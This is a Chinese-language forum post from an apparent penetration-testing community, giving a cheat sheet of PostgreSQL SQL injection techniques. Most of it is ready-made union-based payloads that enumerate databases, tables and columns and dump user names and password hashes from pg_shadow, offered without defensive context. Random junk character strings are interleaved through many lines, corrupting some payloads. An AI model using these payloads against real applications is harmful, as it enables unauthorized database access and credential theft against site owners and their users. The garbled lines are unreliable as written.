中国网络渗透测试联盟

标题: postgreSQL注入总结 [打印本页]

作者: admin    时间: 2013-10-13 12:57
标题: postgreSQL注入总结
结合了MSSQL MySQL Oracle的一些特点
  v5 O. M: H1 Q2 r* j% V

支持多语句执行,语句可以没有from

postgres用户是超级用户(创始人账户) 只有superuser有copy权限

注释: — , /**/% D- l0 o4 R1 q4 v4 ~0 v# [
连接符: %20 , + , /**/

内置函数:1 S; \$ U" T# P) e" \
current_database() //当前数据库名
, W" T' E) v3 r1 Z  N& ysession_user //会话用户
1 A, Y# T! p. T9 q) y2 n" H, O+ tcurrent_user //当前数据库用户
/ D- q6 o' G3 a2 |) J; tuser //当前用户
1 M( T5 w% b+ l1 Lversion() //数据库版本

Union注射:1 L- ^  k, p' [/ p& V; ^* j; ?5 s
order by n–6 G8 x! r3 E) r8 @& X9 i, F7 t
and 1=2 union select null,null,null–
" L; z+ g6 W$ G7 z7 }$ `4 z3 a$ dand 1=2 union select ‘beach’,null,null–
' h4 [  o# _* F! sand 1=2 union select (select version()),null,null–

获取表名,字段名(新版本利用information_schema):
& d& g* _! p) z0 r: ~9 m* agroup_concat(table_name)
! o% O* f9 D4 G8 V6 |& vand 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–
5 ]5 m& m) t! O' A& \and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
9 U9 u+ E6 h7 J/ v& H* ^7 F(老版本)
% P4 t' B0 o# b0 w$ V4 Y* m$ npg_class.oid对应pg_attribute.attrelid& U  Z8 o* a; h' l, d
pg_class.relname表名
+ C0 [1 ]: g4 s, \  {& u) Spg_attribute.attname字段名

select relname from pg_class获取表名
8 c( h" C4 [6 t5 @/ c% ^select oid from pg_class where 条件 获取参数
' j% ~3 R! [/ q3 \2 bselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名

实战:: G2 Q" s$ e7 S0 c
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表
% z6 {- L6 c% P1 r+ w  O: B' P" d+ h% }$ aand 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–/ W; d7 y. }' P, k& ?0 b  F' o
由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136

and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名
* r+ C! U) f4 P9 `/ R======================================================================5 {* I* @; s0 ?4 o3 P, K, M7 ]+ g
and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
/ c# e2 V- b8 iand 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2